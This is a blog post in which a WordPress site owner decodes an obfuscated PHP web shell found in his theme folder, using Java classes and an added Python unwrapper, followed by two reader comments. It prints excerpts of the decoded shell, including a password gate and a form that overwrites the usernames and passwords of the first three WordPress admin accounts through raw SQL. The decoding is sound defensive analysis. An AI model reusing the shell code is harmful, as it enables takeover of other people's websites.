How to Decode PHP’s gzinflate and base64_decode using Java

This morning I found a very weird script on one of my WordPress websites; it looks like someone uploaded a malicious script into my WordPress theme folder.

It looks like a PHP script, but it has been compressed and then base64-encoded, so that it is unpacked at runtime with base64_decode and gzinflate. I tried to decode the malicious script using PHP, but my PHP knowledge is very limited, so I'm using Java instead.

This is what the malicious script looks like:

<?php eval(gzinflate(base64_decode('7H35m9rItejPd75v/gfSmRvb10uztpvx2Ak7Er 
...bla bla bla.... RGpn/Aw==')));?>

Because I couldn't find a proper tool to decode it, I created my own Java class to decode this malicious PHP script.
Here is my Java class:

package base64decoder;

import java.io.ByteArrayInputStream;
import java.io.File;
import java.io.FileOutputStream;
import java.io.InputStream;
import java.util.Scanner;
import java.util.zip.Inflater;
import java.util.zip.InflaterInputStream;
import org.apache.commons.codec.binary.Base64;

public class GZipAndBase64Decoder {

    public static void main(String[] args) throws Exception {
        // coded.txt holds only the base64 string, on a single line
        String isi;
        try (Scanner scanner = new Scanner(new File("coded.txt"))) {
            isi = scanner.nextLine();
        }
        // PHP's gzinflate() works on raw DEFLATE data (no zlib/gzip header),
        // which is exactly what Inflater(true) ("nowrap" mode) decodes
        try (InputStream inflInstream = new InflaterInputStream(
                     new ByteArrayInputStream(new Base64().decode(isi)),
                     new Inflater(true));
             FileOutputStream fileOutputStream =
                     new FileOutputStream(new File("decoded.txt"))) {
            byte[] bytes = new byte[4096];
            int length;
            while ((length = inflInstream.read(bytes, 0, bytes.length)) != -1) {
                fileOutputStream.write(bytes, 0, length);
            }
            fileOutputStream.flush();
        }
    }
}

Create a file "coded.txt" and paste your base64-encoded, deflate-compressed script into it. But remember, only copy the highlighted part, i.e. the base64 string between the quotes (shown here as MALICIOUS SCRIPT):

<?php eval(gzinflate(base64_decode('
MALICIOUS SCRIPT
')));?>

You will find the decoded script in the file "decoded.txt". This is what the decoded PHP script looks like:

error_reporting(0);
@set_time_limit(0);
@session_start();
// configuration
$xSoftware = trim(getenv("SERVER_SOFTWARE"));
// server name
$xServerName = $_SERVER["HTTP_HOST"];
$xName = "BlackAsu";
$masukin = "892ab763f02795bfa28354ef1d39059f";  //cange you password (hash md5) 
$nikmatin = (md5($_POST['pass']));
$crotzz = 1;  // ' 0 '  no login pass
if($nikmatin == $masukin){
	$_SESSION['login'] = "$nikmatin";
}
if($crotzz){
	if(!isset($_SESSION['login']) or $_SESSION['login'] != $masukin){
		die("
// bla bla bla bla (I'm too lazy to copy-paste the whole script)

Use this class instead if you want to decode a script that is only base64-encoded, without the gzinflate layer:

package base64decoder;

import java.io.File;
import java.io.FileOutputStream;
import java.util.Scanner;
import org.apache.commons.codec.binary.Base64;

public class Base64Decoder {

    public static void main(String[] args) throws Exception {
        // coded2.txt holds only the base64 string, on a single line
        String isi;
        try (Scanner scanner = new Scanner(new File("coded2.txt"))) {
            isi = scanner.nextLine();
        }
        // write the decoded bytes directly; round-tripping them through
        // new String(...).getBytes() would corrupt any non-text bytes
        try (FileOutputStream fileOutputStream =
                     new FileOutputStream(new File("decoded2.txt"))) {
            fileOutputStream.write(new Base64().decode(isi));
            fileOutputStream.flush();
        }
    }
}

I'm using Apache Commons Codec to handle the Base64 decoding.
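The same decoding the two Java classes above perform, as an added example that is not from the original post, written in Python. It goes a step further than the post: it peels nested eval(gzinflate(base64_decode('...'))) layers in a loop and also accepts PHP's gzuncompress/gzdecode variants; the WRAPPER regex, the make_sample helper and its BlackAsu-style inner snippet are constructed here for the demonstration.

```python
import base64
import re
import zlib

# Constructed pattern for the wrapper shown in the post:
#   eval(gzinflate(base64_decode('...')));
# It also accepts PHP's gzuncompress()/gzdecode() variants of the same idea.
WRAPPER = re.compile(
    r"eval\s*\(\s*(gzinflate|gzuncompress|gzdecode)\s*\(\s*base64_decode\s*\("
    r"\s*['\"]([A-Za-z0-9+/=\s]+)['\"]\s*\)\s*\)\s*\)"
)

# The three PHP inflaters differ only in container format; zlib's wbits selects it.
# gzinflate() is raw DEFLATE, the same thing Java's Inflater(true) decodes.
WBITS = {"gzinflate": -zlib.MAX_WBITS, "gzuncompress": zlib.MAX_WBITS,
         "gzdecode": 16 + zlib.MAX_WBITS}

def decode_layer(func: str, b64: str) -> str:
    """Undo one base64 + compression layer, exactly as PHP does before eval()."""
    raw = base64.b64decode("".join(b64.split()), validate=True)  # drop line wraps
    return zlib.decompress(raw, WBITS[func]).decode("utf-8", errors="replace")

def unwrap(php_source: str, max_layers: int = 20) -> tuple:
    """Peel nested eval(...(base64_decode('...'))) layers until plain code remains.
    Returns (decoded source, number of layers removed); max_layers bounds the loop."""
    layers = 0
    while layers < max_layers:
        m = WRAPPER.search(php_source)
        if not m:
            break
        php_source = decode_layer(m.group(1), m.group(2))
        layers += 1
    return php_source, layers

def make_sample(inner: str, layers: int = 2) -> str:
    """Constructed test input: wrap `inner` in `layers` rounds of gzdeflate + base64,
    producing the same shape as the script found in the theme folder."""
    src = inner
    for _ in range(layers):
        c = zlib.compressobj(9, zlib.DEFLATED, -zlib.MAX_WBITS)  # raw DEFLATE
        deflated = c.compress(src.encode()) + c.flush()
        src = "eval(gzinflate(base64_decode('%s')));" % base64.b64encode(deflated).decode()
    return "<?php " + src + " ?>"

if __name__ == "__main__":
    code, n = unwrap(make_sample('error_reporting(0); $xName = "BlackAsu";'))
    print(n, "layer(s) removed:", code)
```

To decode a real file, read its contents and pass them to unwrap(); the WRAPPER pattern doubles as a cheap signature for scanning a theme directory for this kind of wrapper.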

And by the way, take a look at this part of the malicious script:

echo "<FORM method='POST'>
<table class='tabnet' style='width:300px;'> <tr><th colspan='2'>Connect to mySQL server</th></tr> <tr><td>&nbsp;&nbsp;Host</td><td>
<input style='width:220px;' class='inputz' type='text' name='localhost' value='localhost' /></td></tr> <tr><td>&nbsp;&nbsp;Database</td><td>
<input style='width:220px;' class='inputz' type='text' name='database' value='wp-' /></td></tr> <tr><td>&nbsp;&nbsp;username</td><td>
<input style='width:220px;' class='inputz' type='text' name='username' value='wp-' /></td></tr> <tr><td>&nbsp;&nbsp;password</td><td>
<input style='width:220px;' class='inputz' type='text' name='password' value='**' /></td></tr>
<tr><td>&nbsp;&nbsp;User baru</td><td>
<input style='width:220px;' class='inputz' type='text' name='admin' value='admin' /></td></tr>
 <tr><td>&nbsp;&nbsp;Pass Baru</td><td>
<input style='width:80px;' class='inputz' type='text' name='pwd' value='123456' />&nbsp;

<input style='width:19%;' class='inputzbut' type='submit' value='change!' name='send' /></FORM>
</td></tr> </table><br><br><br><br>
";
}else{
$localhost = $_POST['localhost'];
$database  = $_POST['database'];
$username  = $_POST['username'];
$password  = $_POST['password'];
$pwd   = $_POST['pwd'];
$admin = $_POST['admin'];

 @mysql_connect($localhost,$username,$password) or die(mysql_error());
 @mysql_select_db($database) or die(mysql_error());

$hash = crypt($pwd);
$a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 1") or die(mysql_error());
$a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 1") or die(mysql_error());
$a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 2") or die(mysql_error());
$a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 2") or die(mysql_error());
$a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 3") or die(mysql_error());
$a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 3") or die(mysql_error());
$a4s=@mysql_query("UPDATE wp_users SET user_email ='".$SQL."' WHERE ID = 1") or die(mysql_error());


if($a4s){
echo "<b> Success ..!! :)) sekarang bisa login ke wp-admin</b> ";
}

Okay, so today's wise word is: don't forget to change your WordPress table prefix :p (the script hardcodes the wp_users table, so its UPDATE statements fail against any other prefix)


2 Comments

Jefri

about 4 years ago

Be careful bro, I also once got hit by this bug through themes that inserted a malicious script and changed the website's .htaccess. Don't forget to always update your WordPress to the latest version. Cheers :)


edwin

about 4 years ago

Hi Jefri, it's a bit strange though, I had already hardened it and updated to the latest version but still got hit. I actually suspect my hosting's OS; no matter how much you harden the application, if the OS is leaky it's all for nothing :D
